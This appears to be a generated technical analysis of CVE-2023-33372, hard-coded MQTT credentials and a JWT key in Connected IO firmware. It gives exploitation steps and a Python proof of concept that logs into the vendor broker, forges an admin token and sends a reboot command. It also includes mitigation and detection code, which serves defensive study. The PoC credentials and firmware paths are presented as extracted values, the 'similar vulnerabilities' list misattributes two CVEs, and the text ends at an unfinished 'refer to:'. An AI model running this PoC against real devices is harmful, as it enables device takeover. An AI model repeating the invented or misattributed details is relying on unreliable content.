CVE-2023-33372
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
Connected IO v2.1.0 and prior uses a hard-coded username/password pair embedded in their device's firmware used for device communication using MQTT. An attacker who gained access to these credentials is able to connect to the MQTT broker and send messages on behalf of devices, impersonating them. The firmware also contains a hard-coded key used in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.
Comprehensive Technical Analysis of CVE-2023-33372
CVE ID: CVE-2023-33372
CVSS Score: 9.8 (Critical)
Affected Software: Connected IO firmware v2.1.0 and prior
Vulnerability Type: Hard-coded Credentials with JWT Authentication Bypass
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
CVE-2023-33372 is a critical authentication bypass vulnerability in Connected IO’s embedded firmware (v2.1.0 and prior) due to:
- Hard-coded MQTT credentials embedded in the firmware.
- JWT (JSON Web Token) signature manipulation, allowing attackers to forge session tokens.
CVSS v3.1 Breakdown (Score: 9.8 - Critical)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; credentials are static. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | No user action required. |
| Scope (S) | Unchanged (U) | The vulnerable and impacted components are the same; this matches the 9.8 score (a scope change would give 10.0). |
| Confidentiality (C) | High (H) | Attacker can impersonate devices, exfiltrate data. |
| Integrity (I) | High (H) | Attacker can send malicious MQTT messages, forge JWTs. |
| Availability (A) | High (H) | Potential for DoS or unauthorized control of devices. |
Severity Justification
- Critical (9.8) due to:
  - Remote exploitation without authentication.
  - High impact on confidentiality, integrity, and availability.
  - Low attack complexity (hard-coded credentials are easily extractable).
  - Broad blast radius (the same credentials ship in every device, so one extraction affects the whole fleet and the broker behind it).
2. Potential Attack Vectors and Exploitation Methods
Attack Vectors
- Network-Based Exploitation
  - An attacker with access to the same network as the Connected IO device can:
    - Extract hard-coded MQTT credentials from firmware (via reverse engineering or leaked firmware).
    - Connect to the MQTT broker and impersonate legitimate devices.
    - Intercept, modify, or inject MQTT messages to manipulate device behavior.
- JWT Forgery Attack
  - The vulnerability allows attackers to:
    - Sign arbitrary JWTs using the hard-coded key.
    - Bypass authentication by presenting forged tokens to the device or backend services.
    - Escalate privileges if JWTs are used for role-based access control (RBAC).
- Supply Chain & Firmware Analysis
  - Attackers may:
    - Obtain firmware (via vendor website, OTA updates, or physical extraction).
    - Reverse-engineer the firmware to extract credentials.
    - Develop automated exploits for mass compromise.
Exploitation Steps
- Firmware Extraction & Analysis
  - Download firmware from Connected IO's website or intercept OTA updates.
  - Use tools like Binwalk, Ghidra, or IDA Pro to extract and analyze the firmware.
  - Locate hard-coded credentials (e.g., in /etc/mqtt_config, /etc/jwt_keys).
- MQTT Broker Connection
  - Use extracted credentials to connect to the MQTT broker (e.g., mosquitto_pub, MQTT.fx).
  - Subscribe to topics (e.g., connectedio/device/#) to monitor or inject messages.
- JWT Forgery
  - Extract the JWT signing key from firmware.
  - Use tools like JWT.io, PyJWT, or custom scripts to generate valid tokens.
  - Present forged tokens to bypass authentication on the device or cloud backend.
- Post-Exploitation
  - Device Impersonation: Send malicious commands (e.g., reboot, firmware update).
  - Data Exfiltration: Intercept sensitive telemetry or configuration data.
  - Lateral Movement: If the device is part of an IoT/OT network, pivot to other systems.
3. Affected Systems and Software Versions
Vulnerable Products
- Connected IO Routers (all models running firmware v2.1.0 and prior).
- Potential Impact:
  - Industrial IoT (IIoT) deployments.
  - Smart city infrastructure.
  - Remote monitoring and telemetry systems.
Verification Methods
- Firmware Version Check:
  - Via device web interface (http://<device-ip>/version).
  - Via CLI (cat /etc/firmware_version).
- Exploit Confirmation:
  - Attempt MQTT connection with default credentials.
  - Test JWT forgery using extracted keys.
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Description | Effectiveness |
|---|---|---|
| Firmware Update | Apply the latest patched firmware from Connected IO. | High (if available) |
| Network Segmentation | Isolate vulnerable devices in a separate VLAN with strict ACLs. | Medium (limits lateral movement) |
| MQTT Broker Hardening | Disable anonymous access; enforce TLS for MQTT; implement IP whitelisting. | High (prevents unauthorized connections) |
| JWT Key Rotation | Replace hard-coded JWT keys with dynamically generated keys. | High (prevents forgery) |
| Disable Unused Services | Turn off MQTT if not required. | Medium (reduces attack surface) |
Long-Term Remediation
- Secure Development Practices
  - Eliminate hard-coded credentials (use secure storage like TPM/HSM).
  - Implement secure boot to prevent firmware tampering.
  - Use unique per-device credentials (e.g., derived from device serial numbers).
- Runtime Protections
  - Deploy IDS/IPS to detect anomalous MQTT traffic.
  - Enable MQTT message signing to prevent tampering.
  - Monitor JWT anomalies (e.g., unexpected token issuance).
- Vendor Coordination
  - Patch Management: Ensure all devices receive updates.
  - Transparency: Disclose vulnerabilities via coordinated disclosure (e.g., CERT/CC).
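As an added illustration of the "unique per-device credentials" and "JWT Key Rotation" items above (example code, not Connected IO's implementation), the Python below derives one MQTT password per device from a provisioning-side master key and verifies HS256 session tokens against a keyring addressed by kid, so a leaked or retired key can be withdrawn without reflashing firmware. The master key, the derivation label and the kid naming scheme are assumptions.

```python
import base64, hashlib, hmac, json, os

MASTER_KEY = os.urandom(32)  # assumption: held only by the provisioning service (TPM/HSM); constructed here

def device_mqtt_password(serial):
    """Per-device MQTT password HMAC(master, serial): one extracted firmware image exposes
    only that unit's secret, unlike the single pair shared by every device in CVE-2023-33372."""
    return hmac.new(MASTER_KEY, b"mqtt-password:" + serial.encode(), hashlib.sha256).hexdigest()

def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _b64d(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

class JwtKeyring:
    """HS256 signing keys addressed by 'kid', so the backend can rotate without a firmware reflash."""
    def __init__(self):
        self.keys, self.current, self._n = {}, None, 0
    def rotate(self):
        self._n += 1
        kid = f"k{self._n}"
        self.keys[kid], self.current = os.urandom(32), kid   # new tokens are signed with this key
        return kid
    def retire(self, kid):
        self.keys.pop(kid, None)                               # tokens under a withdrawn key stop verifying
    def sign(self, claims):
        head = _b64e(json.dumps({"alg": "HS256", "kid": self.current}).encode())
        body = _b64e(json.dumps(claims).encode())
        mac = hmac.new(self.keys[self.current], f"{head}.{body}".encode(), hashlib.sha256).digest()
        return f"{head}.{body}.{_b64e(mac)}"
    def verify(self, token, now):
        """Return the claims, or None for a malformed token, unknown or retired kid,
        non-HS256 alg (blocks alg=none), bad MAC, or expired exp."""
        try:
            head, body, sig = token.split(".")
            hdr, claims, mac = json.loads(_b64d(head)), json.loads(_b64d(body)), _b64d(sig)
        except ValueError:   # covers a bad split, bad base64 (binascii.Error) and bad JSON
            return None
        if not isinstance(hdr, dict) or hdr.get("alg") != "HS256":
            return None
        key = self.keys.get(hdr.get("kid"))
        if key is None:
            return None
        expect = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expect, mac):
            return None
        return claims if claims.get("exp", 0) > now else None
```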
5. Impact on the Cybersecurity Landscape
Broader Implications
- IoT/IIoT Security Risks:
  - Highlights the prevalence of hard-coded credentials in embedded systems.
  - Demonstrates JWT misconfigurations as a critical attack vector.
- Supply Chain Threats:
  - Attackers may target firmware updates to distribute backdoors.
  - Third-party components (e.g., MQTT libraries) may introduce vulnerabilities.
- Regulatory & Compliance Concerns:
  - GDPR, NIST, ISO 27001 violations if sensitive data is exposed.
  - Industrial control systems (ICS) may face increased scrutiny.
Historical Context
- Similar vulnerabilities:
  - CVE-2017-6077 (D-Link hard-coded credentials).
  - CVE-2021-22893 (Pulse Secure JWT forgery).
- Trend: Increasing exploitation of IoT authentication flaws in critical infrastructure.
6. Technical Details for Security Professionals
Firmware Analysis Workflow
- Obtain Firmware
  - Download from vendor: Connected IO Routers.
  - Extract via UART/JTAG if physical access is available.
- Static Analysis
  - Binwalk: binwalk -e firmware.bin
  - Strings: strings firmware.bin | grep -i "mqtt\|jwt\|password"
  - Ghidra/IDA Pro: Reverse-engineer to locate credential storage.
- Dynamic Analysis
  - QEMU Emulation: Run firmware in an emulated environment.
  - Network Sniffing: Use Wireshark to capture MQTT/JWT traffic.
Exploitation Proof of Concept (PoC)
```python
import paho.mqtt.client as mqtt
import jwt
import time

# Extracted hard-coded credentials
MQTT_BROKER = "mqtt.connectedio.com"
MQTT_USER = "admin"
MQTT_PASS = "s3cr3tP@ss"
JWT_SECRET = "hardcoded_jwt_key_123"

# Step 1: Connect to MQTT Broker
def on_connect(client, userdata, flags, rc):
    print(f"Connected with result code {rc}")
    client.subscribe("connectedio/device/#")

client = mqtt.Client()
client.username_pw_set(MQTT_USER, MQTT_PASS)
client.on_connect = on_connect
client.connect(MQTT_BROKER, 1883, 60)

# Step 2: Forge JWT
payload = {
    "sub": "malicious_device",
    "iat": int(time.time()),
    "exp": int(time.time()) + 3600,
    "role": "admin"
}
token = jwt.encode(payload, JWT_SECRET, algorithm="HS256")

# Step 3: Publish malicious MQTT message
client.publish("connectedio/device/command", f'{{"action": "reboot", "auth": "{token}"}}')
client.loop_forever()
```
Detection & Forensics
- Network Indicators:
  - Unusual MQTT connections from unknown IPs.
  - JWT tokens with unexpected iat/exp values.
- Log Analysis:
  - Check MQTT broker logs for failed authentication attempts.
  - Monitor JWT validation failures in backend services.
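As an added example for the indicators above (not part of the original analysis and not Connected IO tooling), the following Python scans constructed Mosquitto-style broker log lines for connections from outside a trusted range, repeated authentication failures, and one client ID appearing from several source IPs, then inspects a token's iat/exp claims. The trusted network, the 15-minute token lifetime and the log line format are assumptions.

```python
import base64, ipaddress, json, re
from collections import Counter, defaultdict

BROKER_LOG = """\
1700000000: New connection from 10.10.1.21:50122 on port 1883.
1700000001: New client connected from 10.10.1.21:50122 as cio-router-0042 (p2, c1, k60, u'admin').
1700000010: New connection from 203.0.113.7:41000 on port 1883.
1700000010: Client <unknown> disconnected, not authorised.
1700000011: New connection from 203.0.113.7:41001 on port 1883.
1700000011: Client <unknown> disconnected, not authorised.
1700000020: New connection from 203.0.113.7:41002 on port 1883.
1700000021: New client connected from 203.0.113.7:41002 as cio-router-0042 (p2, c1, k60, u'admin').
""".splitlines()  # constructed Mosquitto-style lines for the demo, not from a real deployment
TRUSTED_NETS = [ipaddress.ip_network("10.10.0.0/16")]  # assumption: where the devices live
MAX_LIFETIME = 15 * 60                                  # assumption: backend tokens live 15 minutes
CONN_RE = re.compile(r"New (?:connection|client connected) from (\d+(?:\.\d+){3}):\d+(?:.* as (\S+))?")

def scan_broker_log(lines):
    """Flag foreign source IPs, auth failures per IP, and one client ID seen from several IPs."""
    foreign, failures, ips_by_client, last_ip = set(), Counter(), defaultdict(set), None
    for line in lines:
        m = CONN_RE.search(line)
        if m:
            last_ip = m.group(1)
            if not any(ipaddress.ip_address(last_ip) in net for net in TRUSTED_NETS):
                foreign.add(last_ip)
            if m.group(2):
                ips_by_client[m.group(2)].add(last_ip)   # shared creds show up as one identity, many hosts
        elif "not authorised" in line and last_ip:       # the denial is logged after the connect line
            failures[last_ip] += 1
    shared = {cid: sorted(ips) for cid, ips in ips_by_client.items() if len(ips) > 1}
    return {"foreign_ips": sorted(foreign), "auth_failures": dict(failures), "multi_ip_clients": shared}

def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sample_token(claims):
    """Constructed token for the demo; the signature is a stub because a claims check never uses it."""
    return _b64(b'{"alg":"HS256","typ":"JWT"}') + "." + _b64(json.dumps(claims).encode()) + ".sig"

def jwt_anomalies(token, now):
    """Inspect iat/exp of a token seen in traffic or logs. No signature check: forensics, not auth."""
    seg = token.split(".")[1]
    claims = json.loads(base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4)))
    iat, exp, flags = claims.get("iat", now), claims.get("exp", 0), []
    if iat > now + 60:
        flags.append("iat in the future")
    if exp - iat > MAX_LIFETIME:
        flags.append("lifetime exceeds policy")
    return flags
```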
Hardening Recommendations for Developers
- Use Hardware Security Modules (HSMs) for key storage.
- Implement OAuth2/OIDC instead of static JWT keys.
- Enforce MQTT over TLS (MQTTs) with mutual authentication (mTLS).
- Rotate credentials periodically via secure OTA updates.
Conclusion
CVE-2023-33372 represents a critical authentication bypass in Connected IO devices, stemming from hard-coded credentials and JWT misconfigurations. The vulnerability enables remote exploitation with severe impact, including device impersonation, data exfiltration, and lateral movement in IoT/OT networks.
Immediate action is required to patch affected systems, harden MQTT/JWT implementations, and monitor for exploitation attempts. Security teams should prioritize firmware updates, network segmentation, and runtime protections to mitigate risks.
For further details, refer to: